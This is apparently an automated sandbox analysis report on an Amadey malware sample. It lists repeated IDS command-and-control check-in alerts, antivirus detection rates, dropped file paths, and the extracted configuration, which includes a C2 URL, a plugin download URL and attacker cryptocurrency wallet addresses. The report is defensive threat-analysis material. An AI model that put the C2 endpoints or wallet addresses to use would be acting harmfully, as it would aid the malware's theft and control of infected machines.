                            Source Port:50453
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449834802027700 02/07/23-19:57:39.774939
                            SID:2027700
                            Source Port:49834
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450346802027700 02/07/23-20:00:03.180456
                            SID:2027700
                            Source Port:50346
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450050802027700 02/07/23-19:58:39.622154
                            SID:2027700
                            Source Port:50050
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450305802027700 02/07/23-19:59:51.225446
                            SID:2027700
                            Source Port:50305
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450180802027700 02/07/23-19:59:16.281335
                            SID:2027700
                            Source Port:50180
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450186802027700 02/07/23-19:59:17.709490
                            SID:2027700
                            Source Port:50186
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450183802027700 02/07/23-19:59:16.984626
                            SID:2027700
                            Source Port:50183
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450094802027700 02/07/23-19:58:52.753337
                            SID:2027700
                            Source Port:50094
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450275802027700 02/07/23-19:59:42.829008
                            SID:2027700
                            Source Port:50275
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449803802027700 02/07/23-19:57:32.447940
                            SID:2027700
                            Source Port:49803
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450097802027700 02/07/23-19:58:53.510976
                            SID:2027700
                            Source Port:50097
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450015802027700 02/07/23-19:58:31.307259
                            SID:2027700
                            Source Port:50015
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450336802027700 02/07/23-19:59:58.703262
                            SID:2027700
                            Source Port:50336
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449974802027700 02/07/23-19:58:18.969301
                            SID:2027700
                            Source Port:49974
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449977802027700 02/07/23-19:58:19.705616
                            SID:2027700
                            Source Port:49977
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450247802027700 02/07/23-19:59:35.069047
                            SID:2027700
                            Source Port:50247
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449714802027700 02/07/23-19:57:10.084490
                            SID:2027700
                            Source Port:49714
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449885802027700 02/07/23-19:57:55.454532
                            SID:2027700
                            Source Port:49885
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450155802027700 02/07/23-19:59:10.245942
                            SID:2027700
                            Source Port:50155
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449888802027700 02/07/23-19:57:56.245210
                            SID:2027700
                            Source Port:49888
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449806802027700 02/07/23-19:57:33.169488
                            SID:2027700
                            Source Port:49806
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450422802027700 02/07/23-20:00:23.830241
                            SID:2027700
                            Source Port:50422
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450425802027700 02/07/23-20:00:24.567398
                            SID:2027700
                            Source Port:50425
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449799802027700 02/07/23-19:57:31.508216
                            SID:2027700
                            Source Port:49799
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450244802027700 02/07/23-19:59:34.357275
                            SID:2027700
                            Source Port:50244
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450333802027700 02/07/23-19:59:57.984722
                            SID:2027700
                            Source Port:50333
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449908802027700 02/07/23-19:58:01.073849
                            SID:2027700
                            Source Port:49908
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450040802027700 02/07/23-19:58:37.231251
                            SID:2027700
                            Source Port:50040
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450199802027700 02/07/23-19:59:20.621768
                            SID:2027700
                            Source Port:50199
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449796802027700 02/07/23-19:57:30.765231
                            SID:2027700
                            Source Port:49796
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450288802027700 02/07/23-19:59:47.126534
                            SID:2027700
                            Source Port:50288
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450308802027700 02/07/23-19:59:51.952268
                            SID:2027700
                            Source Port:50308
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450158802027700 02/07/23-19:59:10.996736
                            SID:2027700
                            Source Port:50158
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450028802027700 02/07/23-19:58:34.553699
                            SID:2027700
                            Source Port:50028
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450069802027700 02/07/23-19:58:46.668672
                            SID:2027700
                            Source Port:50069
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449920802027700 02/07/23-19:58:04.285165
                            SID:2027700
                            Source Port:49920
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450349802027700 02/07/23-20:00:04.188949
                            SID:2027700
                            Source Port:50349
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449831802027700 02/07/23-19:57:39.071348
                            SID:2027700
                            Source Port:49831
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450219802027700 02/07/23-19:59:28.398284
                            SID:2027700
                            Source Port:50219
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449701802027700 02/07/23-19:57:04.541289
                            SID:2027700
                            Source Port:49701
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449742802027700 02/07/23-19:57:16.147994
                            SID:2027700
                            Source Port:49742
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450012802027700 02/07/23-19:58:30.553987
                            SID:2027700
                            Source Port:50012
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450361802027700 02/07/23-20:00:07.031777
                            SID:2027700
                            Source Port:50361
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450438802027700 02/07/23-20:00:27.675588
                            SID:2027700
                            Source Port:50438
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449819802027700 02/07/23-19:57:36.373215
                            SID:2027700
                            Source Port:49819
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449949802027700 02/07/23-19:58:13.013964
                            SID:2027700
                            Source Port:49949
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450142802027700 02/07/23-19:59:07.121016
                            SID:2027700
                            Source Port:50142
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450101802027700 02/07/23-19:58:54.467418
                            SID:2027700
                            Source Port:50101
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450450802027700 02/07/23-20:00:30.549660
                            SID:2027700
                            Source Port:50450
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450272802027700 02/07/23-19:59:41.450711
                            SID:2027700
                            Source Port:50272
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450231802027700 02/07/23-19:59:31.231345
                            SID:2027700
                            Source Port:50231
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450320802027700 02/07/23-19:59:54.828975
                            SID:2027700
                            Source Port:50320
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllAvira URL Cloud: Label: malware
                            Source: 62.204.41.4/Gol478Ns/index.phpAvira URL Cloud: Label: malware
                            Source: http://62.204.41.4/Gol478Ns/index.phpAvira URL Cloud: Label: malware
                            Source: file.exeReversingLabs: Detection: 64%
                            Source: file.exeVirustotal: Detection: 52%Perma Link
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeReversingLabs: Detection: 61%
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeReversingLabs: Detection: 48%
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeReversingLabs: Detection: 81%
                            Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 80%
                            Source: file.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeJoe Sandbox ML: detected
                            Source: 0.3.file.exe.4b3b820.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                            Source: 19.2.rundll32.exe.6e7c0000.0.unpackMalware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00072F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01082F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

                            Compliance

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeUnpacked PE file: 2.2.aKuf.exe.400000.0.unpack
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: wextract.pdb source: file.exe, bKug.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000006.00000000.363577848.00000000008EE000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000007.00000002.822994493.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000007.00000000.365129064.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000012.00000002.375077518.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000012.00000000.370020877.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.494152388.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.493611540.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000000.619977727.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000002.620319914.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001D.00000000.748590651.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001D.00000002.755553344.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.6.dr, xriv.exe.0.dr
                            Source: Binary string: Healer.pdb source: aKuf.exe, 00000002.00000002.338408809.0000000002390000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bKug.exe.0.dr
                            Source: Binary string: =cC:\mologoz-wavilowive.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A4A000.00000004.00000020.00020000.00000000.sdmp, aKuf.exe, 00000002.00000000.300060819.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aKuf.exe.1.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000004.00000000.339039470.00000000004E2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.823015828.000000006E7CF000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.7.dr, clip64[1].dll.7.dr
                            Source: Binary string: Healer.pdbH5 source: aKuf.exe, 00000002.00000002.338408809.0000000002390000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\mologoz-wavilowive.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A4A000.00000004.00000020.00020000.00000000.sdmp, aKuf.exe, 00000002.00000000.300060819.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aKuf.exe.1.dr
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00072390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01082390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008DFC58 FindFirstFileExW,

                            Networking

                            barindex
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49697 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49699 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49700 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49701 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49702 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49703 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49704 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49705 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49706 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49707 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49708 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49709 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49710 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49711 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49712 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49713 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49714 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49715 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49719 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49720 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49721 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49722 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49723 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49724 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49725 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49726 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49727 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49728 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49729 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49730 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49731 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49732 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49733 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49734 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49735 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49736 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49737 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49738 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49739 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49740 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49741 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49742 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49743 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49744 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49745 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49746 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49747 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49748 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49749 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49750 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49753 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49754 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49755 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49757 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49758 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49760 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49762 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49763 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49764 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49765 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49766 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49768 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49769 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49770 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49771 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49772 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49773 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49774 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49775 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49776 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49777 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49778 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49779 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49780 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49782 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49783 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49784 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49785 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49786 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49787 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49788 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49789 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49790 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49791 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49792 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49793 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49794 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49795 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49796 -> 62.204.41.4:80
